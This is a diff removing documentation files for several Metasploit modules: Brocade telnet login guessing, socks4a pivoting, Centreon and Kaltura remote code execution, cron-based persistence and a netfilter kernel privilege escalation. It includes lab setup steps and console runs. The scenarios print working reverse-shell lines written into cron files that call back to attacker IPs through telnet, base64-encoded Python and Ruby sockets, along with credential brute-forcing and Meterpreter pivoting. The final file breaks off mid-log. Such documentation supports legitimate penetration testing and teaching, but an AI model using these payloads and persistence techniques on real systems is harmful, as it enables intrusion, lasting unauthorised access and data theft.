--More--, next page: Space, next line: Return key, quit: Control-c 
-  ptrace                 Global ptrace information
-  qd-buffer-profile      User configured buffer/descriptor profiles
-  qos-profiles           QOS configuration
-  qos-tos                IPv4 ToS based QoS
-  radius                 show radius server debug info
-  rate-limit             Rate-limiting table and actions
-  redundancy             Display management redundancy details
-  relative-utilization   Relative utilization list
-  reload                 Scheduled system reset
-  reserved-vlan-map      Reserved VLAN map status
-  rmon                   Rmon status
-  running-config         Current running-config
-  scheduler-profile      User configured scheduling profiles
-  sflow                  sFlow information
-  snmp                   SNMP statistics
-  sntp                   Show SNTP
-  span                   Spanning tree status
-  statistics             Packet statistics
-  stp-bpdu-guard         BPDU Guard status
-  stp-group              Spanning Tree Group Membership
-  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
-                         counters
-  table-mac-vlan         MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  tech-support           System snap shot for tech support
-  telnet                 Telnet connection
-  topology-group         Topology Group Membership
-  traffic-policy         Show traffic policy definition
-  trunk                  Show trunk status
-  users                  User accounts
-  v6-l4-acl-sessions     Show IPv6 software sessions
-  version                System status
-  vlan                   VLAN status
-  vlan-group             VLAN Group Membership
-  voice-vlan             Show voice vlan
-  vsrp                   Show VSRP commands
-  web-connection         Current web connections
-  webauth                web authentication information
-  who                    User login
-  |                      Output modifiers
-  <cr>
-BR-telnet@FWS624 Router#
-```
-
-  Example run against emulator mentioned above:
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 127.0.0.1
-[*]    Found: username@127.0.0.1
-[*]    Found: ttrogdon@127.0.0.1
-[*]    Found: dmudd@127.0.0.1
-[*]  Attempting username gathering from running-config on 127.0.0.1
-[*]    Found: TopDogUser@127.0.0.1
-[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
-[*] Attempting to start session 127.0.0.1:23 with username:password
-[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
-[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
-[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                              Connection
-  --  ----    -----------                              ----------
-  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
-  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
-
-msf auxiliary(brocade_enable_login) >
-```
@@ -1,60 +0,0 @@
-## Verification Steps
-
-  1. Start `msfconsole`
-  2. Do: `use auxiliary/server/socks4a`
-  3. Do: `run`
-  4. Do: `curl --proxy socks4a://localhost:1080 https://github.com`
-  5. You should see the source for the Github homepage
-
-## Options
-
-  **SRVHOST**
-
-  The local IP address to bind the proxy to. The default value of `0.0.0.0` will expose the proxy to everything on the attacker's network.
-
-  **SRVPORT**
-
-  The local port to bind the proxy to. The default value is `1080`, the standard port for a socks4a proxy.
-
-## Scenarios
-
-  This module is great when pivoting across a network. Suppose we have two machines:
-
-  1. Attacker's machine, on the `192.168.1.0/24` subnet.
-  2. Victim machine with two network interfaces, one attached to the `192.168.1.0/24` subnet and the other attached to the non-routable `10.0.0.0/24` subnet.
-
-  We'll begin by starting the socks4a proxy:
-  ```
-  msf > use auxiliary/server/socks4a
-  msf auxiliary(socks4a) > run
-  [*] Auxiliary module execution completed
-  [*] Starting the socks4a proxy server
-  msf auxiliary(socks4a) >
-  ```
-
-  Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the `autoroute` script to enable access to the non-routable subnet:
-
-  ```
-  meterpreter > run autoroute -s 10.0.0.0/24
-  ```
-
-  The `autoroute` module will enable our local socks4a proxy to direct all traffic to the `10.0.0.0/24` subnet through our Meterpreter session, causing it to emerge from the victim's machine and thus giving us access to the non-routable subnet. We can now use `curl` to connect to a machine on the non-routable subnet via the socks4a proxy:
-  ```
-  curl --proxy socks4a://localhost:1080 http://10.0.0.15:8080/robots.txt
-  ```
-
-  We can take this a step further and use proxychains to enable other tools that don't have built-in support for proxies to access the non-routable subnet. The short-and-sweet guide to installing and configuring proxychains looks something like this:
-
-  ```
-  # apt-get install proxychains
-  # cp /etc/proxychains.conf /etc/proxychains.conf.backup
-  # echo "socks4 127.0.0.1 8080" > /etc/proxychains.conf
-  ```
-
-  From there, we can use our other tools by simply prefixing them with `proxychains`:
-
-  ```
-  # proxychains curl http://10.0.0.15:8080/robots.txt
-  # proxychains nmap -sT -Pn -n -p 22 10.0.0.15
-  # proxychains firefox
-  ```
@@ -1,211 +0,0 @@
-## Vulnerable Application
-
-1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
-2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
-
-### Creating A Testing Environment
-
-Creating a testing environment for this application contained many steps, so I figured I would document the process here.
-
-  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install. My user was `centreon`
-  2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
-```
-sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
-sudo add-apt-repository ppa:ondrej/php
-sudo apt-get install php5.6
-sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
-sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
-sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
-  select OK
-  select No Configuration
-sudo apt-get install snmp-mibs-downloader
-```
-  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
-```
-a2enmod php5.6
-a2dismod php7.0
-```
-  4. Restart apache with `sudo apache2ctl restart`
-  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
-```
-wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
-tar xvf nagios-plugins-2.1.1.tar.gz
-cd nagios-plugins-2.1.1/
-./configure
-make
-sudo make install
-```
-  5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)
-```
--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
-+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
-@@ -70,8 +70,13 @@
-#endif
-      break;
-   case 3: /* SSLv3 protocol */
-+#if defined(OPENSSL_NO_SSL3)
-+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
-+      return STATE_CRITICAL;
-+#else
-      method = SSLv3_client_method();
-      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
-+#endif
-      break;
-   default: /* Unsupported */
-      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
-```
-  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-clib
-cd centreon-clib/build
-cmake .
-make
-sudo make install
-```
-  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-broker
-cd centreon-broker/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-engine
-cd centreon-engine/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
-```
-sudo mkdir /var/log/centreon-engine
-cd ~
-sudo pear install XML_RPC-1.4.5
-(may need to install php-xml)
-wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-cd centreon-2.5.3
-sudo ./install.sh -i
-  <enter>
-  q
-  y
-  y
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  <enter>
-  centreon
-  <enter>
-  /var/log/centreon-engine
-  /home/centreon/nagios-plugins-2.1.1/plugins
-  <enter>
-  /etc/init.d/centengine
-  /usr/local/bin/centengine
-  /usr/local/etc/
-  /usr/local/etc/
-  /etc/init.d/centengine
-  <enter>
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-  <enter>
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-```
-  10. Fix apache config
-```
-sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
-sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
-sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
-sudo a2enconf centreon
-sudo service apache2 reload
-```
-  11. Configure via website.  Browse to <ip>/centreon
-```
-next
-next
-select centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/bin/centenginestats
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  next
-select centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/cbmod.so
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  next
-Pick whatever details about your user you want, next
-Fill in mysql Root password, next
-next
-next
-finish
-```
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/linux/http/centreon_useralias_exec`
-  4. Do: `set payload`
-  5. Do: `set rhost`
-  6. Do: `check`
-  7. Do: ```run```
-  8. You should get a shell.
-
-## Scenarios
-
-Just a standard run.
-
-    msf > use exploit/linux/http/centreon_useralias_exec
-    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
-    lhost => 192.168.2.229
-    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
-    rhost => 192.168.2.85
-    msf exploit(centreon_useralias_exec) > set verbose true
-    verbose => true
-    msf exploit(centreon_useralias_exec) > check
-    [+] Version Detected: 2.5.3
-    [*] 192.168.2.85:80 The target appears to be vulnerable.
-    msf exploit(centreon_useralias_exec) > exploit
-    [*] Started reverse TCP handler on 192.168.2.229:4444 
-    [*] Sending malicious login
-    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
-    whoami
-    www-data
-    uname -a
-    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-```
@@ -1,147 +0,0 @@
-## Vulnerable Application
-
-This module exploits an Object Injection vulnerability in Kaltura. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the context of the web server user.
-
-Kaltura has a module named keditorservices that takes user input and then uses it as an unserialized function parameter. The constructed object is based on the SektionEins Zend code execution POP chain PoC, with a minor modification to ensure Kaltura processes it and the Zend_Log function's __destruct() method is called. Kaltura versions prior to 11.1.0-2 are affected by this issue.
-
-**Vulnerable Application Installation Steps**
-
-Kaltura has their own RPM and/or DEB packages to help us to install it without any issue. Following steps are slightly different than official wiki in order to install the vulnerable packages.
-
-Following steps are valid on the CentOS 6 x64 bit operating system.
-
-1. Install CentOS-6 x64 and run `yum update -y` in order to fetch and install the latest packages. Also setting the hostname to something like _kalturahack.dev_ would be wise, because it will be used during Kaltura installation.
-2. Disable iptables and selinux. 
-```
-iptables -F
-service iptables stop
-chkconfig iptables off
-setenforce permissive
-(selinux will be enabled on reboot unless editing /etc/selinux/config file.)
-```
-3. Install following pre-requisites.
-* PHP 5.3.n, 5.4.n, 5.5.n, 5.6.n [the official distro repo version]
-* MySQL/MariaDB [the official distro repo version]. Please make sure your MySQL is configured not to enforce strict mode.
-* JRE 1.7.n (openjdk can be used)
-
-4. Install Kaltura yum repo.
-```
-rpm -ihv http://installrepo.kaltura.org/releases/kaltura-release.noarch.rpm
-```
-
-5. Kaltura repo is configured for the latest version by default. We need to change it to one of the vulnerable releases. Thus, open `/etc/yum.repos.d/kaltura.repo` file with your favorite text editor and perform following replacement.
-
-Original file. (# lines just ignored)
-```
-[Kaltura]
-name = Kaltura Server
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1 
-enabled = 1
-
-[Kaltura-noarch]
-name = Kaltura Server arch independent
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/noarch
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1
-enabled = 1
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-```
-After changes.
-```
-[Kaltura]
-name = Kaltura Server
-baseurl = http://installrepo.kaltura.org/releases/10.10.0/RPMS/$basearch/
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1 
-enabled = 1
-
-[Kaltura-noarch]
-name = Kaltura Server arch independent
-baseurl = http://installrepo.kaltura.org/releases/10.10.0/RPMS/noarch
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1
-enabled = 1
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-```
-
-6. Install kaltura-server. This will take a while. 
-```
-yum clean all
-yum install kaltura-server
-```
-
-7. Run the following commands in order to initiate the database and start necessary services.
-```
-/opt/kaltura/bin/kaltura-mysql-settings.sh
-service memcached restart
-service ntpd restart
-chkconfig memcached on
-chkconfig ntpd on
-```
-
-8. Start the kaltura configuration script `/opt/kaltura/bin/kaltura-config-all.sh` .
-
-```
-[Email\NO]: "<your email address>"
-CDN hostname [kalrpm.lcl]: "<your hostname>"
-Apache virtual hostname [kalrpm.lcl]: "<your hostname>"
-Which port will this Vhost listen on [80]?:
-
-DB hostname [127.0.0.1]: "<127.0.0.1>"
-DB port [3306]: "<3306>"
-MySQL super user [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "<root>"
-MySQL super user passwd [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "<your root password>"
-Analytics DB hostname [127.0.0.1]: "<127.0.0.1>"
-Analytics DB port [3306]: "<3306>"
-Sphinx hostname [127.0.0.1]: "<127.0.0.1>"
-
-Secondary Sphinx hostname: [leave empty if none] "<empty>"
-
-VOD packager hostname [kalrpm.lcl]: "<http://kaltura-nginx-hostname>"
-
-VOD packager port to listen on [88]: 
-
-Service URL [http://kalrpm.lcl:80]: "<http://apache-hostname:80>"
-
-Kaltura Admin user (email address): "<your email address>"
-Admin user login password (must be minimum 8 chars and include at least one of each: upper-case, lower-case, number and a special character): "<your kaltura admin password>"
-Confirm passwd: "<your kaltura admin password>"
-
-Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: "<your timezone>"
-How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? "<your preferred system name>"
-Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: "<your contact URL>"
-'Contact us' phone number [+1 800 871 5224]? "<your phone numer>"
-
-Is your Apache working with SSL?[Y/n] "<n>"
-It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] "<y>"
-Which port will this Vhost listen on? [80] "<80>"
-Please select one of the following options [0]: "<0>"
-```
-
-I do recommend that leaving all default values as is except SSL. You may want to install Kaltura without SSL support.
-
-These steps are slightly different than following instruction.
-[http://kaltura-install-packages.readthedocs.io/en/latest/install-kaltura-redhat-based/](http://kaltura-install-packages.readthedocs.io/en/latest/install-kaltura-redhat-based/)
-
-## Verification Steps
-
-A successful check of the exploit will look like this:
-
-```
-msf > use exploit/unix/webapp/kaltura_unserialize_rce 
-msf exploit(kaltura_unserialize_rce) > set RHOST centoshacker.dev
-RHOST => centoshacker.dev
-msf exploit(kaltura_unserialize_rce) > check
-[+] centoshacker.dev:80 The target is vulnerable.
-msf exploit(kaltura_unserialize_rce) > exploit 
-
-[*] Started reverse TCP handler on 10.0.0.1:4444 
-[*] Sending stage (33721 bytes) to 10.0.0.134
-[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.134:50312) at 2016-09-17 22:56:44 +0300
-
-meterpreter > pwd
-/opt/kaltura/app/alpha/web
-meterpreter >
-```
@@ -1,144 +0,0 @@
-### Creating A Testing Environment
-
-This module has been tested against:
-
-1. Kali Rolling
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/cron_persistence`
-  5. Do: `set session #`
-  6. Do: `set target #`
-  7. Do: `set verbose true`
-  8. Optional Do: `set username` (depends on target selection)
-  9. Optional Do: `set cleanup false`
-  10. Do: `exploit`
-
-## Options
-
-  **username**
-
-  Set a specific user's crontab if target 'User Crontab' is selected
-
-  **timing**
-
-  Set cron's timing.  Default is to run within a minute.  If this is changed, WsfDelay should be adjusted to compensate
-
-  **cleanup**
-
-  After the delayed period, use either perl (User/System Crontab) or standard MSF functionality to remove the cron entry.  **THIS WILL STOP THE PERSISTENCE!!!**
-
-## Scenarios
-
-### Kali Rolling (root)
-
-Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 10.10.60.168
-    rhosts => 10.10.60.168
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 10.10.60.168:22 SSH - Starting bruteforce
-    [+] 10.10.60.168:22 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.18.0-kali3-686-pae #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) i686 GNU/Linux '
-    [*] Command shell session 1 opened (10.10.60.168:50618 -> 10.10.60.168:22) at 2016-06-20 09:48:14 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Run our module (Cron)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/cron_persistence
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 0
-    target => 0
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse double handler
-    [*] Max line length is 65537
-    [*] Writing 152 bytes in 1 chunks of 518 bytes (octal-encoded), using printf
-    [+] Writing * * * * * root sh -c '(sleep 3867|telnet 10.10.60.168 4444|while : ; do sh && break; done 2>&1|telnet 10.10.60.168 4444 >/dev/null 2>&1 &)' #bAeBQqUYeb to /etc/cron.d/FiThkldAZR
-    [*] Waiting 90sec for callback
-    [*] Accepted the first client connection...
-    [*] Accepted the second client connection...
-    [*] Command: echo xPBXQvodQdzgByKR;
-    [*] Writing to socket A
-    [*] Writing to socket B
-    [*] Reading from sockets...
-    [*] Reading from socket A
-    [*] A: "xPBXQvodQdzgByKR\r\n"
-    [*] Matching...
-    [*] B is input...
-    [*] Command shell session 2 opened (10.10.60.168:4444 -> 10.10.60.168:45087) at 2016-06-20 13:04:02 -0400
-    [+] Deleted /etc/cron.d/FiThkldAZR
-
-Run our module (System Crontab)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/cron_persistence
-    msf exploit(cron_persistence) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(cron_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 2
-    target => 2
-    msf exploit(cron_persistence) > set cleanup false
-    cleanup => false
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Max line length is 65537
-    [*] Writing 1326 bytes in 1 chunks of 4969 bytes (octal-encoded), using printf
-    [+] Writing * * * * * root python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgICAgOyAgICAgaG9zdD0iMTkyLjE2OC4xOTkuMTI4IiAgICAgICA7ICAgICBwb3J0PTQ0NDQgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgICAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgMCkgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAxKSAgICAgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgICAgIDsgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" #SnwfsUhNys to /etc/crontab
-    [*] Waiting 90sec for callback
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.128:54837) at 2016-06-20 13:24:01 -0400
-
-And since we didn't clean up, if our session dies...
-
-    ^C
-    Abort session 2? [y/N]  y
-    
-    [*] 10.10.60.168 - Command shell session 2 closed.  Reason: User exit
-    msf exploit(cron_persistence) > use exploit/multi/handler 
-    msf exploit(handler) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(handler) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.128:54842) at 2016-06-20 13:27:01 -0400
-
-Run our module (User Crontab)
-
-    msf exploit(cron_persistence) > set payload cmd/unix/reverse_ruby
-    payload => cmd/unix/reverse_ruby
-    msf exploit(cron_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 1
-    target => 1
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Max line length is 65537
-    [*] Writing 1247 bytes in 1 chunks of 4566 bytes (octal-encoded), using printf
-    [+] Writing * * * * * ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.199.128","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' #IiWAtaIrHs to /var/spool/cron/crontabs/root
-    [*] Reloading cron to pickup new entry
-    [*] Waiting 90sec for callback
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.128:55031) at 2016-06-20 14:22:01 -0400
@@ -1,218 +0,0 @@
-## Notes
-
-Originally this module was written to drop the binary files on the target via metasm.  However, metasm wasn't able to compile due to the libc6-dev-i386 requirement, so it was decided to compile on the target or drop included binary instead of compiling real time.
-
-This module (and the original exploit) are written in two parts: desc, and pwn.  Desc does the heavy lifting to prep/condition the environment, pwn does the payload executing.
-
-## Creating A Testing Environment
-
-There are a few requirements for this module to work (ubuntu):
-
-  1. ip_tables.ko has to be loaded (root running iptables -L will do such)
-  2. shem and sham can not be installed/running
-
-This module has been tested against:
-
-  1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
-  2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic
-
-This does not work against the following vulnerable systems.  Additional work may be required to the binary and C code to enable these targets.
-  
-  1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
-  2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
-  3. RHEL < [kernel-3.10.0-327.36.1.el7](https://rhn.redhat.com/errata/RHSA-2016-1847.html)
-  4. Suse < [kernel-default-3.12.59-60.45.2](http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00060.html)
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/netfilter_priv_esc`
-  5. Do: `set session #`
-  6. Do: `set verbose true`
-  7. Do: `exploit`
-
-## Options
-
-  **MAXWAIT**
-
-  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)
-
-  **WritableDir**
-
-  A folder we can write files to.  Defaults to /tmp
-
-  **REEXPLOIT**
-  
-  When re-exploiting, no need to run desc (it may even fail), so we can simply run pwn and get our shell.
-
-## Scenarios
-
-### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
-
-#### Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-    rhosts => 127.0.0.1
-    msf auxiliary(ssh_login) > set username nagios
-    username => nagios
-    msf auxiliary(ssh_login) > set password nagios
-    password => nagios
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'nagios:nagios' 'uid=1000(nagios) gid=1000(nagios) groups=1000(nagios),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1001(nagcmd) Linux nagios 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (127.0.0.1:36085 -> 127.0.0.1:22) at 2016-09-16 01:15:34 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-#### Escalate
-
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
-    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
-    [+] libc6-dev-i386 is installed
-    [+] gcc-multilib is installed
-    [+] gcc is installed
-    [*] Live compiling exploit on system
-    [*] Checking if ip_tables is loaded in kernel
-    [+] ip_tables.ko is loaded
-    [*] Checking if shem or sham are installed
-    [+] shem and sham not present.
-    [*] Writing desc executable to /tmp/fI1xW1Js.c
-    [*] Max line length is 65537
-    [*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
